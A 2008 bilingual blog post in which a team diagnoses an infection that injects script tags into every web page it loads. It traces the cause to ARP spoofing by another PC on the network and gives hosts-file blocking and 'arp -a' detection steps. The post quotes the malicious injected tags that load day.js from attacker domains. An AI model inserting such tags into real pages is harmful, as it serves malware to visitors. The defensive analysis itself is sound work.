Posts Tagged ‘ad.5iyy.info’

mx.content-type.cn oder ad.5iyy.info Virus enttarnt!

Thursday, July 3rd, 2008

english version

Update: siehe unten wie man den Virus findet

Alle Webseiten welche geladen werden enthalten an erster Stelle den Code:

<script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script>

/* Update vom 07.07.2008: Es wird jetzt ein neues JS geladen: */
<script language="javascript" SRC="http://ad.5iyy.info/day.js"></script>

Wirklich unschön wenn ein und derselbe eklige Trojaner das ganze Team blockiert.

Wir haben uns den Trojaner mittlerweile mit 7 PCs eingefangen, wo auch immer das Ding herkam.

Bis jetzt sieht es fast aus als könnte es ein Rootkit sein, da sowohl IE, FF wie auch Opera betroffen sind und Virenscanner ihn nicht finden,
verdächtige Prozesse sind auch nicht auszumachen.

Um dem Trojaner zumindest die Funktion zu nehmen kann man ganz einfach das Windows Hostfile editieren (c:\windows\system32\drivers\etc\hosts).
Dort folgende Einträge hinzufügen:
127.0.0.1 mx.content-type.cn
127.0.0.1 content-type.cn
127.0.0.1 ad.5iyy.info
127.0.0.1 5iyy.info

Danach folgendes in die Eingabeaufforderung (Start -> Ausführen) eingeben:
ipconfig /flushdns

Damit spielt man dem System vor, dass die Domain mx.content-type.cn auf dem eigenen PC liegt wodurch das Script nicht mehr geladen werden kann. Der Trojaner ist dann zumindest nicht mehr gefährlich, wenn er auch noch nicht gelöscht ist.

Folgende Virenscanner erkennen das Ding bisher nicht:

  • AntivirXP/Avira
  • LavaSoft Ad-Aware
  • Spybot Search&Destroy
  • Kaspersky Online Scanner
  • Kaspersky AntiVirus
  • AVG Antivirus
  • AVAST Antivirus
  • CCleaner

Es gibt ein Update wenn bekannt ist wie man das Teil los wird.

Schönen Gruß an mx.content-type.cn und ad.5iyy.info 🙂

Update:
Teilweise scheint der Trojaner inaktiv zu sein, nach Neustart der Netzwerkverbindung war er plötzlich wieder an Bord und in allen Browsern (ohne die Browser neu zu starten).
Es sieht danach aus als würde das Teil eine Art “unsichtbaren” (rootkit?) lokalen Proxy starten über welchen dann der komplette Traffic läuft.

Update, wir sind dem Problem auf der Spur!

Der Trojaner befindet sich nicht auf dem PC auf dem er zu sein scheint.
Probiert folgendes aus um den tatsächlichen Verursacher zu finden:

Auf dem PC auf dem der Javascript-Code eingefügt wird:
Start -> ausführen -> cmd -> “arp -a”
Ihr solltet dann eine Tabelle in folgender Form finden:
Internet Address Physical Address Type
192.168.1.1 00-40-f4-9e-57-21 dynamic
192.168.1.5 00-40-f4-9e-57-27 dynamic
192.168.1.119 00-40-f4-9e-57-21 dynamic

Sucht darin nach der “Physical Address” des Gateway-Computers oder einfach nur nach evtl. doppelt vorkommenden Adressen in der zweiten Spalte.
In kopiertem Beispiel war der PC mit der echten Adresse “192.168.1.119” der Verursacher des Übels.
Auf diesem läuft das Schadprogramm. Wir sind gerade dabei dort nach Viren zu scannen.

English version:

If you got the problem that in every loaded page appears a javascript tag like <script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script> this is the solution for your problem.

The cause is a trojan horse (virus) on another computer in your network!

This other computer is telling your PC that it is the gateway to the internet by modifying its hardware address (MAC). Your computer is in consequence sending all traffic to the infected PC which forwards it to the internet and filters it in order to put its malicious code.

You can find out which computer is the evil one by typing following into your command line:
arp -a
In the appearing table search for a double assigned physical address which is once assigned to the gateway IP address and once assigned to another IP.
Find out which computer is the other IP and you will have the virus host.
Scan that one for virus and malware (we are just about to conduct that scan).